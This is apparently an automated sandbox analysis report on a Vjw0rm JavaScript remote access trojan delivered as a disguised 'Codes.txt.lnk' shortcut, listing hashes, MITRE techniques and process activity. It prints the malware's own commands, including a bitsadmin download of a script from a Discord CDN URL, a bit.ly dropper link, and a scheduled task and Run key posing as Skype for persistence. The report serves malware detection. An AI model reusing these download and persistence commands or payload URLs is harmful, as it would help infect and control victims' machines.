vjw0rm | 91b660e99b14d4d790953f9db3ba34d046d494624b53f53ef646fab40c64ace2

General

Target

Codes.txt.lnk
Size

1KB
MD5

537399896538f5897c325a350603a567
SHA1

0a2ff41a38f91f79dde2a579138396bc5e5a7378
SHA256

91b660e99b14d4d790953f9db3ba34d046d494624b53f53ef646fab40c64ace2
SHA512

fb61b629d1ba6c38164bf21a637a28dc741fe29df47ae81af0e448273b30a60504085f94ee3d31e981ca9d23ba7517a13ac4a8a4e805a13999d67bd29daec030

Score

10^/10

Language

hta

Source

URLs

hta.dropper

https://bit.ly/3j6OXnh

Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
trojan worm vjw0rm
Blocklisted process makes network request 5 IoCs

Processes:

mshta.exeWScript.exe

flow pid process

8 1656 mshta.exe
10 1656 mshta.exe
12 1656 mshta.exe
14 1656 mshta.exe
22 2336 WScript.exe
Drops startup file 1 IoCs

Processes:

WScript.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c1.js WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c1.js	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

Registry Run Keys / Startup Folder

Modify Registry

Processes:

WScript.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\JJM3W6LMN3 = "\"C:\\Users\\Admin\\AppData\\Roaming\\c1.js\""	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

212 schtasks.exe
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

3996 bitsadmin.exe
Modifies registry class 1 IoCs

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings mshta.exe

pid	process
212	schtasks.exe

pid	process
3996	bitsadmin.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	mshta.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cmd.exemshta.exeWScript.exe

description	pid	process	target process
PID 3560 wrote to memory of 1656	3560	cmd.exe	mshta.exe
PID 3560 wrote to memory of 1656	3560	cmd.exe	mshta.exe
PID 1656 wrote to memory of 3996	1656	mshta.exe	bitsadmin.exe
PID 1656 wrote to memory of 3996	1656	mshta.exe	bitsadmin.exe
PID 1656 wrote to memory of 2336	1656	mshta.exe	WScript.exe
PID 1656 wrote to memory of 2336	1656	mshta.exe	WScript.exe
PID 2336 wrote to memory of 212	2336	WScript.exe	schtasks.exe
PID 2336 wrote to memory of 212	2336	WScript.exe	schtasks.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Codes.txt.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:3560

C:\Windows\System32\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://cdn.discordapp.com/attachments/870779144429006911/870824147524157480/c1.js C:\Users\Admin\AppData\Local\Temp\c1.js
3⤵
- Download via BitsAdmin
PID:3996

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\Users\Admin\AppData\Roaming\c1.js
4⤵
- Creates scheduled task(s)
PID:212